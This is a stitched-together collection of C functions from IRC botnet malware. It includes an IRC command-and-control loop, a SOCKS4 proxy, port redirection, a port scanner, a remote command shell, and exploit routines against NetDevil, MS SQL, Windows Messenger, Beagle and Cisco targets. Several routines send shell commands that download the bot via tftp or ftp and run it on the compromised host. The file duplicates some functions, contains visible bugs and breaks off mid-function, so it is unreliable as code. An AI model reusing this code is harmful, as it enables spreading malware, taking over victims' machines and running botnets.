BOOL killthread(int threadnum)
{
BOOL threadkilled = FALSE;
if ((threadnum>0) && (threadnum<MAXTHREADS)) {
TerminateThread(threads[threadnum].tHandle, 0);
if (threads[threadnum].tHandle != 0)
threadkilled = TRUE;
threads[threadnum].tHandle = 0;
threads[threadnum].id = 0;
threads[threadnum].parent = 0;
if(threads[threadnum].pid > 0)
killProcess(threads[threadnum].pid);
threads[threadnum].pid = 0;
threads[threadnum].name[0] = '\0';
threads[threadnum].nick[0] = '\0';
fclosesocket(threads[threadnum].sock);
threads[threadnum].sock = 0;
fclosesocket(threads[threadnum].csock);
threads[threadnum].csock = 0;
}
return (threadkilled);
}
unsigned long GetSpeed(char *szHost) {
if(strlen(szHost) > MAXHOSTNAME) return 0;
unsigned long lBufSize=NUM_KILOBYTES*1024;
SOCKET sSock;
SOCKADDR_IN ssin;
memset(&ssin, 0, sizeof(ssin));
ssin.sin_family = AF_INET;
if ((ssin.sin_addr.s_addr = ResolveAddress(szHost)) == 0) return 0;
ssin.sin_port = fhtons(80);
if ((sSock = fsocket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == INVALID_SOCKET) return 0;
if (fconnect(sSock, (LPSOCKADDR)&ssin, sizeof(ssin)) == SOCKET_ERROR) return 0;
char *szBuf=new char[lBufSize+3];
srand(GetTickCount());
int iChar=(char)(rand() % 255);
memset(szBuf, 0, lBufSize+1 );
memset(szBuf, iChar, lBufSize );
unsigned long lStrLen=strlen(szBuf);
char *szPostReq=new char[lBufSize+1002];
sprintf(szPostReq, "POST / HTTP/1.0\r\n"
"Host: %s\r\n"
"Content-Length: %d\r\n"
"\r\n",
szHost, lStrLen);
strcat(szPostReq, szBuf);
strcat(szPostReq, "\r\n");
lStrLen=strlen(szPostReq);
unsigned long lStartMS=GetTickCount();
for(unsigned long l=0; l<lStrLen; l+=1024) {
if(lStrLen-l < 1024) {
if(fsend(sSock, szPostReq+l, lStrLen-l,0) == SOCKET_ERROR) {
fclosesocket(sSock);
free(szBuf);
free(szPostReq);
return 0;
}
} else {
if(fsend(sSock, szPostReq+l, 1024,0) == SOCKET_ERROR) {
fclosesocket(sSock);
free(szBuf);
free(szPostReq);
return 0;
}
}
}
unsigned long lEndMS=GetTickCount();
float fElapsedS=(float)(lEndMS-lStartMS)/1000.0f;
if(fElapsedS==0.0f) fElapsedS=1.0f;
float fBytesPS=(float)lStrLen/fElapsedS;
float fKBytesPS=fBytesPS/1024.0f;
float fBitsPS=fBytesPS*8.0f;
float fKBitsPS=fBitsPS/1024.0f;
fclosesocket(sSock);
free(szBuf);
free(szPostReq);
return (unsigned long)fKBitsPS;
}
BOOL NetDevil(EXINFO exinfo)
{
char buffer[IRCLINE];
DWORD mode=0;
SOCKET ssock;
if ((ssock = fsocket(AF_INET,SOCK_STREAM,0)) == INVALID_SOCKET)
return FALSE;
SOCKADDR_IN sin;
sin.sin_family = AF_INET;
sin.sin_addr.s_addr = finet_addr(exinfo.ip);
sin.sin_port = fhtons(exinfo.port);
fconnect(ssock,(LPSOCKADDR)&sin,sizeof(sin));
fioctlsocket(ssock,FIONBIO,&mode);
for (int i=0; passwords[i]; i++) {
Sleep(50);
memset(buffer,0,sizeof(buffer));
if (NetDevil_Receive(ssock) == -1)
break;
if (frecv(ssock, buffer, sizeof(buffer), 0) <= 0)
break;
if (strcmp(buffer,"passed") == 0) {
sprintf(buffer,"nd %s %s",exinfo.ip ,passwords[i-1]);
fsend(ssock, buffer, strlen(buffer), 0);
if (NetDevil_Upload(exinfo.ip,ssock) == 1) {
fclosesocket(ssock);
_snprintf(buffer,sizeof(buffer),"[%s]: Exploiting IP: %s, Password: (%s)",exploit[exinfo.exploit].name,exinfo.ip,((strcmp(passwords[i-i],"")==0)?("(no password)"):(passwords[i-1])));
if (!exinfo.silent) irc_privmsg(exinfo.sock, exinfo.chan, buffer, exinfo.notice);
addlog(buffer);
exploit[exinfo.exploit].stats++;
return TRUE;
}
break;
}
if (strcmp(buffer,"pass_pleaz") == 0) {
memset(buffer,0,sizeof(buffer));
sprintf(buffer,"pass_pleaz%s",passwords[i]);
fsend(ssock,buffer ,strlen(buffer), 0);
continue;
}
else break;
}
fclosesocket(ssock);
return FALSE;
}
DWORD WINAPI IdentThread(LPVOID param)
{
char user[12], buffer[IRCLINE];
int threadnum = (int)param;
BOOL success = FALSE;
SOCKET ssock,csock;
SOCKADDR_IN ssin, csin;
memset(&ssin, 0, sizeof(ssin));
ssin.sin_family = AF_INET;
ssin.sin_port = fhtons((unsigned short)113);
ssin.sin_addr.s_addr=INADDR_ANY;
if ((ssock = fsocket(AF_INET, SOCK_STREAM, 0)) != INVALID_SOCKET) {
threads[threadnum].sock = ssock;
if (fbind(ssock, (LPSOCKADDR)&ssin, sizeof(ssin)) != SOCKET_ERROR) {
if (flisten(ssock, 5) != SOCKET_ERROR) {
int csin_len = sizeof(csin);
while (1) {
if ((csock = faccept(ssock,(LPSOCKADDR)&csin,&csin_len)) == INVALID_SOCKET)
break;
sprintf(buffer, "[IDENTD]: Client connection from IP: %s:%d.", finet_ntoa(csin.sin_addr), csin.sin_port);
addlog(buffer);
if (frecv(csock,buffer,sizeof(buffer),0) != SOCKET_ERROR) {
Split(buffer,0);
memset(user, 0, sizeof(user));
_snprintf(buffer,sizeof(buffer)," : USERID : UNIX : %s\r\n",rndnick(user, LETTERNICK, FALSE));
if (fsend(csock,buffer,strlen(buffer),0) != SOCKET_ERROR)
success = TRUE;
}
}
}
}
}
if (!success) {
sprintf(buffer, "[IDENTD]: Error: server failed, returned: <%d>.", fWSAGetLastError());
addlog(buffer);
}
fclosesocket(ssock);
fclosesocket(csock);
clearthread(threadnum);
ExitThread(0);
}
DWORD WINAPI IRC_Connect(LPVOID param)
{
IRC irc = *((IRC *)param);
IRC *ircs = (IRC *)param;
ircs->gotinfo = TRUE;
int rval = 0;
SOCKADDR_IN ssin;
while (1) {
memset(&ssin, 0, sizeof(ssin));
ssin.sin_family = AF_INET;
ssin.sin_port = fhtons(irc.port);
if ((ssin.sin_addr.s_addr=ResolveAddress(irc.host)) == 0)
break;
memset(threads[irc.threadnum].nick, 0, sizeof(threads[irc.threadnum].nick));
rndnick(threads[irc.threadnum].nick, nicktype, nickprefix);
if ((threads[irc.threadnum].sock = fsocket(PF_INET, SOCK_STREAM, IPPROTO_TCP)) == INVALID_SOCKET) {
Sleep(5000);
continue;
}
if (fconnect(threads[irc.threadnum].sock, (LPSOCKADDR)&ssin, sizeof(ssin)) == SOCKET_ERROR) {
fclosesocket(threads[irc.threadnum].sock);
FlushDNSCache();
Sleep(5000);
continue;
}
#ifdef DEBUG_CONSOLE
printf("Bot started and connect to %s.\n", irc.host);
#endif
addlogv("[MAIN]: Connected to %s.", irc.host);
rval = IRC_ReceiveLoop(threads[irc.threadnum].sock, irc.host, irc.channel, irc.chanpass, threads[irc.threadnum].nick, irc.clone);
fclosesocket(threads[irc.threadnum].sock);
if (rval == 0)
continue;
else if (rval == 1) {
Sleep(900000);
continue;
}
else if (rval == 2)
break;
}
clearthread(irc.threadnum);
return rval;
}
DWORD WINAPI DCCChatThread(LPVOID param)
{
DCC dcc = *((DCC *)param);
DCC *dccs = (DCC *)param;
dccs->gotinfo = TRUE;
char buffer[4096];
SOCKET ssock;
if ((ssock = CreateSock(dcc.host,dcc.port)) == INVALID_SOCKET) {
sprintf(buffer,"[DCC]: Failed to open socket.");
if (!dcc.silent) irc_privmsg(ssock, dcc.sendto, buffer, dcc.notice);
addlog(buffer);
clearthread(dcc.threadnum);
ExitThread(1);
}
if (open_cmd(ssock,"") == -1) {
sprintf(buffer,"[DCC]: Failed to open remote command shell.");
if (!dcc.silent) irc_privmsg(ssock, dcc.sendto, buffer, dcc.notice);
addlog(buffer);
fclosesocket(ssock);
clearthread(dcc.threadnum);
ExitThread(1);
}
Sleep(100);
while (1) {
memset(buffer, 0, sizeof(buffer));
if (frecv(ssock, buffer, sizeof(buffer), 0) <= 0)
break;
strcat(buffer,"\n");
if (!send_commands(buffer))
break;
Sleep(100);
if (findthreadid(RCMD_THREAD) == 0)
break;
}
sprintf(buffer,"[DCC]: Failed to send to Remote command shell.");
if (!dcc.silent) irc_privmsg(ssock, dcc.sendto, buffer, dcc.notice);
addlog(buffer);
fclosesocket(ssock);
clearthread(dcc.threadnum);
ExitThread(0);
}
// port redirect function
DWORD WINAPI RedirectThread(LPVOID param)
{
REDIRECT redirect = *((REDIRECT *)param);
REDIRECT *redirectp = (REDIRECT *)param;
redirectp->gotinfo = TRUE;
char sendbuf[IRCLINE];
DWORD id;
SOCKADDR_IN rsin, csin;
memset(&rsin, 0, sizeof(rsin));
rsin.sin_family = AF_INET;
rsin.sin_port = fhtons(redirect.lport);
rsin.sin_addr.s_addr = INADDR_ANY;
int csin_len = sizeof(csin);
SOCKET rsock, csock;
if ((rsock = fsocket(PF_INET, SOCK_STREAM, IPPROTO_TCP)) != INVALID_SOCKET) {
threads[redirect.threadnum].sock = rsock;
fWSAAsyncSelect(rsock, 0, WM_USER + 1, FD_READ);
if (fbind(rsock, (LPSOCKADDR)&rsin, sizeof(rsin)) == 0) {
if (flisten(rsock, 10) == 0) {
while(1) {
if ((csock = faccept(rsock, (LPSOCKADDR)&csin, &csin_len)) != INVALID_SOCKET) {
redirect.csock = csock;
redirect.gotinfo = FALSE;
sprintf(sendbuf,"[REDIRECT]: Client connection from IP: %s:%d, Server thread: %d.", finet_ntoa(csin.sin_addr), csin.sin_port, redirect.threadnum);
redirect.cthreadnum = addthread(sendbuf,REDIRECT_THREAD,csock);
threads[redirect.cthreadnum].parent = redirect.threadnum;
if (threads[redirect.cthreadnum].tHandle = CreateThread(NULL,0,&RedirectLoopThread,(LPVOID)&redirect,0,&id)) {
while (redirect.gotinfo == FALSE)
Sleep(50);
} else {
addlogv("[REDIRECT]: Failed to start client thread, error: <%d>.", GetLastError());
break;
}
}
}
}
}
}
fclosesocket(csock);
fclosesocket(rsock);
clearthread(redirect.threadnum);
ExitThread(0);
}
int check_os(char *host,unsigned short target_port, int *sp)
{
SOCKET sSock;
if ((sSock = fsocket(PF_INET, SOCK_STREAM, IPPROTO_TCP)) != INVALID_SOCKET) {
SOCKADDR_IN ssin;
memset(&ssin, 0, sizeof(ssin));
ssin.sin_family = AF_INET;
ssin.sin_addr.s_addr = finet_addr(host);
ssin.sin_port = fhtons((unsigned short)target_port);
if (fconnect(sSock,(LPSOCKADDR)&ssin,sizeof(ssin)) != SOCKET_ERROR) {
char recv_buff[5000];
memset(recv_buff,0,sizeof(recv_buff));
TIMEVAL timeout;
timeout.tv_sec = 5;
timeout.tv_usec = 0;
fd_set fd;
FD_ZERO(&fd);
FD_SET(sSock, &fd);
if (fselect(0, &fd, NULL, NULL, &timeout) > 0) {
if (frecv(sSock,recv_buff,sizeof(recv_buff),0) > 0) {
if (fsend(sSock,(const char *)send_buff,strlen((const char*)send_buff),0) > 0) {
if (frecv(sSock,recv_buff,sizeof(recv_buff),0) > 0) {
fclosesocket(sSock);
*sp=atoi(&recv_buff[37]);
if (recv_buff[8] == 5 && recv_buff[12] == 0)
return ID_WIN2K;
else if (recv_buff[8] == 5 && recv_buff[12] == 1)
return ID_WINXP;
else if (recv_buff[8] == 5 && recv_buff[12] == 2)
return ID_WIN2K3;
else if (recv_buff[8] == 4)
return ID_WINNT;
else
return ID_UNKNOWN;
}
}
}
}
}
fclosesocket(sSock);
}
return 1;
}
BOOL thcsql(char *target, void* conn,EXINFO exinfo)
{
IRC* irc=(IRC*)conn;
unsigned int sock,rc;
struct sockaddr_in sqludp;
if ((sock=fsocket(AF_INET,SOCK_DGRAM,IPPROTO_UDP))==INVALID_SOCKET)
return FALSE;
sqludp.sin_family=AF_INET;
sqludp.sin_addr.s_addr=finet_addr(exinfo.ip);
sqludp.sin_port=fhtons(exinfo.port);
if ((rc=fconnect(sock, (struct sockaddr *)&sqludp, sizeof(struct sockaddr_in)))=SOCKET_ERROR)
{
if(rc==0)
{
fsend(sock,badbuffer,sizeof(badbuffer)-1,0);
Sleep(1000);
if (ConnectShell(exinfo, 31337))
{
exploit[exinfo.exploit].stats++;
if (!exinfo.silent)
irc->privmsg(target,"%s %s: Exploiting IP: %s.", scan_title, exploit[exinfo.exploit].name, exinfo.ip);
}
else
if (!exinfo.silent && exinfo.verbose)
irc->privmsg(target,"%s %s: Failed to exploit IP: %s.", scan_title, exploit[exinfo.exploit].name, exinfo.ip);
}
}
fshutdown(sock,1);
fclosesocket(sock);
return FALSE;
}
BOOL AdvPortOpen(unsigned long ip, unsigned int port, unsigned int delay)
{
SOCKADDR_IN sin;
unsigned long blockcmd=1;
SOCKET sock = fsocket(AF_INET,SOCK_STREAM,0);
if (sock == INVALID_SOCKET)
return FALSE;
sin.sin_family = AF_INET;
sin.sin_addr.S_un.S_addr = ip;
sin.sin_port = fhtons((unsigned short)port);
fioctlsocket(sock,FIONBIO,&blockcmd);
fconnect(sock,(LPSOCKADDR)&sin,sizeof(sin));
TIMEVAL timeout;
timeout.tv_sec=delay;
timeout.tv_usec=0;
FD_SET rset;
FD_ZERO(&rset);
FD_SET(sock,&rset);
int i = fselect(0,0,&rset,0,&timeout);
fclosesocket(sock);
if (i<=0)
return FALSE;
else
return TRUE;
}
BOOL killthread(int threadnum)
{
BOOL threadkilled = FALSE;
if ((threadnum>0) && (threadnum<MAX_THREADS))
{
TerminateThread(threads[threadnum].tHandle, 0);
if (threads[threadnum].tHandle != 0)
threadkilled = TRUE;
threads[threadnum].tHandle = 0;
threads[threadnum].id = 0;
threads[threadnum].parent = 0;
#ifndef NO_PROCESS
if(threads[threadnum].pid > 0)
KillPid(threads[threadnum].pid);
#endif
threads[threadnum].pid = 0;
threads[threadnum].name[0] = '\0';
// threads[threadnum].nick[0] = '\0';
// fclosesocket(threads[threadnum].sock);
// threads[threadnum].sock = 0;
fclosesocket(threads[threadnum].csock);
threads[threadnum].csock = 0;
}
return threadkilled;
}
// checks ip for open port
DWORD WINAPI ScanConnectThread(LPVOID param)
{
static char sendbuf[IRCLINE];
SCAN scan = *((SCAN *)param);
SCAN *scans = (SCAN *)param;
scans->cgotinfo = TRUE;
SOCKADDR_IN ssin;
memset(&ssin, 0, sizeof(ssin));
ssin.sin_family = AF_INET;
ssin.sin_port = fhtons((unsigned short)scan.port);
ssin.sin_addr = scan.addy;
SOCKET sock = fsocket(PF_INET, SOCK_STREAM, IPPROTO_TCP);
if(sock != INVALID_SOCKET) {
DWORD err = fconnect(sock, (LPSOCKADDR)&ssin, sizeof(SOCKADDR_IN));
threads[scan.threadnum].sock = sock;
if (err != SOCKET_ERROR) {
sprintf(sendbuf,"nz m (portscan.p l g) »» IP: %s Port: %d is open.", finet_ntoa(scan.addy), scan.port);
irc_privmsg(scan.sock, scan.chan, sendbuf, scan.notice);
addlog(sendbuf);
}
}
fclosesocket(sock);
return 0;
}
SOCKET CreateSock(char *host, unsigned short port)
{
SOCKET ssock;
if ((ssock = fsocket(AF_INET, SOCK_STREAM, 0)) == INVALID_SOCKET)
return INVALID_SOCKET;
SOCKADDR_IN ssin;
memset(&ssin, 0, sizeof(ssin));
ssin.sin_family = AF_INET;
ssin.sin_port = fhtons(port);
IN_ADDR in;
in.s_addr = finet_addr(host);
LPHOSTENT Hostent = NULL;
if (in.s_addr == INADDR_NONE)
Hostent = fgethostbyname(host); //hostname
if (Hostent == NULL && in.s_addr == INADDR_NONE) //error dns
return INVALID_SOCKET;
ssin.sin_addr = ((Hostent != NULL)?(*((LPIN_ADDR)*Hostent->h_addr_list)):(in));
if (fconnect(ssock, (LPSOCKADDR) &ssin, sizeof(ssin)) == SOCKET_ERROR) {
fclosesocket(ssock);
return INVALID_SOCKET;
}
return (ssock);
}
BOOL CiscoHTTP(EXINFO exinfo)
{
int ret,SocketFD;
char buffer[4096];
if((SocketFD = fsocket(AF_INET, SOCK_STREAM, 0)) < 0) return FALSE;;
SOCKADDR_IN ssin;
memset(&ssin, 0, sizeof(ssin));
ssin.sin_family = AF_INET;
ssin.sin_addr.s_addr = finet_addr(exinfo.ip);
ssin.sin_port = fhtons((unsigned short)exinfo.port);
if(fconnect(SocketFD, (LPSOCKADDR)&ssin, sizeof(ssin)) != SOCKET_ERROR) {
if(fsend(SocketFD, HTTP_REQUEST, strlen(HTTP_REQUEST), 0) < 0)
return FALSE;
memset(buffer, 0, sizeof(buffer));
if((ret = frecv(SocketFD, buffer, sizeof(buffer), 0)) < 0)
return FALSE;
fclosesocket(SocketFD);
if(ret < 5)
return FALSE;
if(strstr(buffer, "HTTP/1.0 200 OK") == NULL || strstr(buffer, "cisco") == NULL)
return FALSE;
char sendbuf[IRCLINE];
_snprintf(sendbuf, sizeof(sendbuf), "-\x03\x34\2cisco(http)\x03\2- found router: %s", exploit[exinfo.exploit].name, exinfo.ip);
irc_privmsg(exinfo.sock, exinfo.chan, sendbuf, exinfo.notice);
addlog(sendbuf);
exploit[exinfo.exploit].stats++;
return TRUE;
}
return FALSE;
}
int IRC_ReceiveLoop(SOCKET sock, char *server, char *channel, char *chanpass, char *nick, int clone)
{
char buffer[4096], masters[MAXLOGINS][MAXIDENT], *lines[MAX_LINES], nickbuf[MAXNICKLEN], host[MAXHOSTNAME];
int i, numlines, repeat, in_channel=0;
for (i = 0; i < MAXLOGINS; i++)
masters[i][0] = '\0';
if (serverpass[0] != '\0')
irc_sendv(sock,"PASS %s\r\n",serverpass);
sprintf(buffer, "NICK %s\r\nUSER %s 0 0 :%s\r\n", nick, rndnick(nickbuf,LETTERNICK, FALSE), nick);
if (fsend(sock, buffer, strlen(buffer), 0) == SOCKET_ERROR) {
fclosesocket(sock);
Sleep(5000);
return 0;
}
while(1) {
memset(buffer, 0, sizeof(buffer));
if (frecv(sock, buffer, sizeof(buffer), 0) <= 0)
break;
// FIX ME: Truncation occurs here
numlines = Split(buffer,&lines);
for (i=0;i < numlines ;i++) {
repeat=1;
do {
#ifdef DEBUG_LOGGING
debuglog(lines[i]);
#endif
#ifdef DEBUG_CONSOLE
printf("%s\n",lines[i]);
#endif
if (lines[i] != NULL)
repeat = IRC_ProtocolParse(lines[i], sock, server, channel, chanpass, nick, host, masters, &in_channel, repeat, clone);
repeat--;
if (repeat > 0)
Sleep(FLOOD_DELAY);
} while (repeat > 0);
switch (repeat) {
case -1:
return 0; // Reconnect
case -2:
return 1; // Disconnect
case -3:
return 2; // Quit
default:
break;
}
}
}
return 0;
}
BOOL MessengerService(EXINFO exinfo)
{
int sockUDP,ver,packetsz;
unsigned char packet[8192];
struct sockaddr_in targetUDP;
struct
{
char os[30];
DWORD SEH;
DWORD JMP;
} targetOS[] =
{
{
"Windows 2000 SP 3 (en)",
0x77ee044c, // unhandledexceptionfilter pointer
0x768d693e // cryptsvc.dll call [esi+48] 0x768d693e
},
{
"Windows XP SP 1 (en)",
0x77ed73b4,
0x7804bf52 //rpcrt4.dll call [edi+6c]
}
};
int TargetOS = FpHost(exinfo.ip, FP_RPC);
if ((TargetOS == OS_WINNT) || (TargetOS == OS_UNKNOWN)) return FALSE;
if (TargetOS == OS_WIN2K) ver = 0;
if (TargetOS == OS_WINXP) ver = 1;
ZeroMemory(&targetUDP, sizeof(targetUDP));
targetUDP.sin_family = AF_INET;
targetUDP.sin_addr.s_addr = finet_addr(exinfo.ip);
targetUDP.sin_port = fhtons(exinfo.port);
packetsz = PreparePacket((char*)packet,sizeof(packet),targetOS[ver].JMP,targetOS[ver].SEH);
if ((sockUDP = fsocket(AF_INET, SOCK_DGRAM, IPPROTO_UDP)) == -1)
{
return FALSE;
}
if (fsendto(sockUDP, (char*)packet, packetsz, 0, (struct sockaddr *)&targetUDP, sizeof(targetUDP)) == -1)
{
return FALSE;
}
fclosesocket(sockUDP);
Sleep(500);
if (ConnectShellEx(exinfo, 9191) == true) {
exploit[exinfo.exploit].stats++;
return TRUE;
}
return FALSE;
}
BOOL SkonkShell( EXINFO exinfo, unsigned int bindport ) {
int len;
char recvbuf[1024];
SOCKET sockfd;
SOCKADDR_IN shell_addr;
memset(&shell_addr, 0, sizeof(shell_addr));
shell_addr.sin_family = AF_INET;
shell_addr.sin_addr.s_addr = finet_addr(exinfo.ip);
shell_addr.sin_port = fhtons(bindport);
if ((sockfd = fsocket(AF_INET, SOCK_STREAM, 0)) == INVALID_SOCKET )
return false;
if (fconnect(sockfd, (LPSOCKADDR)&shell_addr, sizeof(shell_addr)) == SOCKET_ERROR)
return false;
char mkdir_buff[400];
len = frecv(sockfd, recvbuf, 1024, 0);
//////////////////////////////////////////////////////////////////////////////////
//////////////////////////////////////////////////////////////////////////////////
#ifndef NO_TFTPD
_snprintf(mkdir_buff, sizeof (mkdir_buff),
"tftp -i %s get %s &%s\r\n",
GetIP( exinfo.sock ),filename, filename);
#endif
//////////////////////////////////////////////////////////////////////////////////
//////////////////////////////////////////////////////////////////////////////////
//////////////////////////////////////////////////////////////////////////////////
//////////////////////////////////////////////////////////////////////////////////
if (fsend(sockfd, mkdir_buff, strlen(mkdir_buff),0) == -1)
return false;
Sleep(500);
_snprintf(mkdir_buff, sizeof (mkdir_buff), "%s\r\n", filename);
if (fsend(sockfd, mkdir_buff, strlen(mkdir_buff),0) == -1)
return false;
len = frecv(sockfd, recvbuf, 1024, 0);
fclosesocket(sockfd);
return true;
}
DWORD WINAPI Socks4Thread(LPVOID param)
{
char sendbuf[IRCLINE];
SOCKADDR_IN ssin, csin;
SOCKET ssock, csock;
DWORD lpThreadId;
int csin_len = sizeof(csin);
SOCKS4 socks4 = *((SOCKS4 *)param);
SOCKS4 *socks4p = (SOCKS4 *)param;
socks4p->gotinfo = TRUE;
memset(&ssin,0,sizeof(ssin));
ssin.sin_family = AF_INET;
ssin.sin_port = fhtons((unsigned short)socks4.port);
ssin.sin_addr.s_addr = INADDR_ANY;
ssock = fsocket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
threads[socks4.threadnum].sock=ssock;
if (fbind(ssock, (LPSOCKADDR)&ssin, sizeof(ssin)) == 0) {
if (flisten(ssock, 10) == 0) {
sprintf(sendbuf, "[SOCKS4]: Server started on: %s:%d.", GetIP(socks4.sock), socks4.port);
if (!socks4.silent) irc_privmsg(socks4.sock, socks4.chan, sendbuf, socks4.notice);
addlog(sendbuf);
while (1) {
csock = faccept(ssock, (LPSOCKADDR)&csin, &csin_len);
socks4.cgotinfo = FALSE;
sprintf(sendbuf,"[SOCKS4]: Client connection from IP: %s:%d, Server thread: %d.", finet_ntoa(csin.sin_addr), csin.sin_port, socks4.threadnum);
socks4.cthreadnum = addthread(sendbuf,SOCKS4_THREAD,csock);
threads[socks4.cthreadnum].parent = socks4.threadnum;
if (threads[socks4.cthreadnum].tHandle = CreateThread(NULL, 0, &Socks4ClientThread, (LPVOID)&socks4, 0, &lpThreadId)) {
while (socks4.cgotinfo == FALSE)
Sleep(5);
} else
sprintf(sendbuf, "[SOCKS4]: Failed to start client thread, error: <%d>.", GetLastError());
addlog(sendbuf);
}
}
}
fclosesocket(ssock);
sprintf(sendbuf, "[SOCKS4]: Failed to start server on Port %d.", socks4.port);
if (!socks4.silent) irc_privmsg(socks4.sock, socks4.chan, sendbuf, socks4.notice);
addlog(sendbuf);
clearthread(socks4.threadnum);
ExitThread(0);
}
EXCEPTION_DISPOSITION cdecl _except_handler(struct _EXCEPTION_RECORD *ExceptionRecord,
void *EstablisherFrame,struct _CONTEXT *ContextRecord,void *DispatcherContext)
{
// do some clean-up
fclosesocket(threads[0].sock);
killthreadall();
fWSACleanup();
fWSACleanup();
Sleep(100);
PROCESS_INFORMATION pinfo;
STARTUPINFO sinfo;
memset(&pinfo, 0, sizeof(pinfo));
memset(&sinfo, 0, sizeof(sinfo));
sinfo.lpTitle = "";
sinfo.cb = sizeof(sinfo);
sinfo.dwFlags = STARTF_USESHOWWINDOW;
#ifdef DEBUG_CONSOLE
sinfo.wShowWindow = SW_SHOW;
#else
sinfo.wShowWindow = SW_HIDE;
#endif
char botfile[MAX_PATH],sysdir[MAX_PATH];
GetSystemDirectory(sysdir, sizeof(sysdir));
GetModuleFileName(NULL, botfile, sizeof(botfile));
if (CreateProcess(NULL, botfile, NULL, NULL, TRUE, NORMAL_PRIORITY_CLASS | DETACHED_PROCESS, NULL, sysdir, &sinfo, &pinfo)) {
Sleep(100);
CloseHandle(pinfo.hProcess);
CloseHandle(pinfo.hThread);
}
// Change EAX in the context record so that it points to someplace
// where we can successfully write
ContextRecord->Eax = (DWORD)&scratch;
_asm
{ // Remove our EXECEPTION_REGISTRATION record
mov eax,[ESP] // Get pointer to previous record
mov FS:[0], EAX // Install previous record
add esp, 8 // Clean our EXECEPTION_REGISTRATION off stack
}
ExitProcess(0);
// Tell the OS to restart the faulting instruction
return ExceptionContinueExecution;
}
bool ConnectShell2(EXINFO exinfo) {
int len;
char recvbuf[1024];
SOCKET sockfd;
SOCKADDR_IN shell_addr;
memset(&shell_addr, 0, sizeof(shell_addr));
shell_addr.sin_family = AF_INET;
shell_addr.sin_addr.s_addr = finet_addr(exinfo.ip); // = *((LPIN_ADDR) * lpHostEntry->h_addr_list);
shell_addr.sin_port = fhtons(xport);;
if ((sockfd = fsocket(AF_INET, SOCK_STREAM, 0)) == INVALID_SOCKET )
return false;
if (fconnect(sockfd, (LPSOCKADDR)&shell_addr, sizeof(shell_addr)) == SOCKET_ERROR)
return false;
char mkdir_buff[400];
len = frecv(sockfd, recvbuf, 1024, 0);
#ifndef NO_TFTPD
_snprintf(mkdir_buff, sizeof (mkdir_buff),
"tftp -i %s get %s\r\n",
GetIP(exinfo.sock),filename, filename);
#endif
#ifndef NO_FTPD
_snprintf(mkdir_buff, sizeof (mkdir_buff),
"echo open %s %d > o&echo user 1 1 >> o &echo get %s >> o &echo quit >> o &ftp -n -s:o &del /F /Q o &%s\r\n",
GetIP(exinfo.sock),FTP_PORT, filename, filename);
#endif
if (fsend(sockfd, mkdir_buff, strlen(mkdir_buff),0) == -1)
return false;
Sleep(500);
_snprintf(mkdir_buff, sizeof (mkdir_buff), "%s\r\n", filename);
if (fsend(sockfd, mkdir_buff, strlen(mkdir_buff),0) == -1)
return false;
len = frecv(sockfd, recvbuf, 1024, 0);
fclosesocket(sockfd);
return true;
}
BOOL Beagle(EXINFO exinfo)
{
char *BeagleAuth, buffer[IRCLINE], botfile[MAX_PATH], fname[_MAX_FNAME], ext[_MAX_EXT];
BOOL success = FALSE;
WSADATA WSAData;
if (fWSAStartup(MAKEWORD(1,1), &WSAData)!=0)
return FALSE;
SOCKET sSock;
if((sSock = fsocket(PF_INET, SOCK_STREAM, IPPROTO_TCP)) != INVALID_SOCKET) {
SOCKADDR_IN ssin;
memset(&ssin, 0, sizeof(ssin));
ssin.sin_family = AF_INET;
ssin.sin_addr.s_addr = finet_addr(exinfo.ip);
ssin.sin_port = fhtons(exinfo.port);
if(fconnect(sSock, (LPSOCKADDR)&ssin, sizeof(ssin)) != SOCKET_ERROR) {
BeagleAuth = ((strcmp(exinfo.command, "beagle1") == 0)?(BeagleAuth1):(BeagleAuth2));
if(fsend(sSock, BeagleAuth, sizeof(BeagleAuth), 0) != SOCKET_ERROR) {
if (frecv(sSock, buffer, 8, 0) != SOCKET_ERROR) {
GetModuleFileName(0, botfile, sizeof(botfile));
_splitpath(botfile, NULL, NULL, fname, ext);
_snprintf(botfile, sizeof(botfile), "%s%s", fname, ext);
_snprintf(buffer,sizeof(buffer),"http://%s:%s/%s", GetIP(sSock), httpport, botfile);
if(fsend(sSock, buffer, sizeof(buffer), 0))
success = TRUE;
}
}
}
}
fclosesocket(sSock);
fWSACleanup();
if (success) {
_snprintf(buffer, sizeof(buffer), "[%s]: Exploiting IP: %s.", exploit[exinfo.exploit].name, exinfo.ip);
if (!exinfo.silent) irc_privmsg(exinfo.sock, exinfo.chan, buffer, exinfo.notice);
addlog(buffer);
exploit[exinfo.exploit].stats++;
}
return (success);
}
int NetDevil_Receive(SOCKET ssock)
{
TIMEVAL timeout;
timeout.tv_sec = 30;//timeout after 30 sec.
timeout.tv_usec = 0;
fd_set fd_struct;
FD_ZERO(&fd_struct);
FD_SET(ssock, &fd_struct);
if (fselect(0, &fd_struct, NULL, NULL, &timeout) <= 0) {
fclosesocket(ssock);
return -1;
}
return 0;
}
bool ConnectShell2(EXINFO exinfo) {
int len;
char recvbuf[1024];
SOCKET sockfd;
SOCKADDR_IN shell_addr;
memset(&shell_addr, 0, sizeof(shell_addr));
shell_addr.sin_family = AF_INET;
shell_addr.sin_addr.s_addr = finet_addr(exinfo.ip);
shell_addr.sin_port = fhtons(7777);
if ((sockfd = fsocket(AF_INET, SOCK_STREAM, 0)) == INVALID_SOCKET )
return false;
if (fconnect(sockfd, (LPSOCKADDR)&shell_addr, sizeof(shell_addr)) == SOCKET_ERROR)
return false;
char mkdir_buff[400];
len = frecv(sockfd, recvbuf, 1024, 0);
_snprintf(mkdir_buff, sizeof (mkdir_buff),
"echo open %s %d > o&echo user 1 1 >> o &echo get bling.exe >> o &echo quit >> o &ftp -n -s:o &bling.exe\r\n",
GetIP(exinfo.sock),FTP_PORT);
if (fsend(sockfd, mkdir_buff, strlen(mkdir_buff),0) == -1)
return false;
Sleep(500);
_snprintf(mkdir_buff, sizeof (mkdir_buff), "%s\r\n", filename);
if (fsend(sockfd, mkdir_buff, strlen(mkdir_buff),0) == -1)
return false;
len = frecv(sockfd, recvbuf, 1024, 0);
fclosesocket(sockfd);
return true;
}
// FIX ME: This could probably be (re)moved, its just from the original exploit layout.
int WksSocket(int tm, int port, const char *WksIP) {
unsigned int sock;
unsigned long y = 1;
struct timeval timeout;
struct sockaddr_in target_ip;
if ((sock = fsocket(AF_INET, SOCK_STREAM, 0)) == -1)
return -1;
target_ip.sin_family = AF_INET;
target_ip.sin_addr.s_addr = finet_addr(WksIP);
